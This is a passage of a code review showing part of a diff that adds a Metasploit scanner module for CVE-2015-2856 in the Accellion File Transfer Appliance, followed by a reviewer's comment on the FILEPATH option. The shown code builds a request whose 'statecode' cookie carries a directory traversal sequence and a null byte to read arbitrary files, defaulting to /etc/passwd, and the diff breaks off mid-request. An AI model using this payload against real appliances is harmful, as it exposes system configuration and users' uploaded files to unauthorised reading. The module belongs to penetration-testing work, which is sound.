modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb

```diff
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Accellion FTA statecode Cookie Arbitrary File Read',
+      'Description'    => %q{
+          This module exploits a file disclosure vulnerability in the Accellion
+        File Transfer appliance. This vulnerability is triggered when a user-provided
+        'statecode' cookie parameter is appended to a file path that is processed as
+        a HTML template. By prepending this cookie with directory traversal sequence
+        and appending a NULL byte, any file readable by the web user can be exposed.
+        The web user has read access to a number of sensitive files, including the
+        system configuration and files uploaded to the appliance by users.
+        This issue was confirmed on version FTA_9_11_200, but may apply to previous
+        versions as well. This issue was fixed in software update FTA_9_11_210.
+      },
+      'Author'         => [ 'hdm' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://r-7.co/R7-2015-08'],
+          ['CVE', '2015-2856']
+        ],
+      'DisclosureDate' => 'Jul 10 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [true, 'The URI to request that triggers a call to template()', '/courier/intermediate_login.html']),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+      ], self.class)
+  end
+
+  def run_host(ip)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => datastore['TARGETURI'],
+      'cookie' => 'statecode=../../../../..' + datastore['FILEPATH'] + '%00',
```

Comment:
This lets the ``FILEPATH`` always be an absolute URI. Relative URIs are not that interesting since the CWD is static (appliance).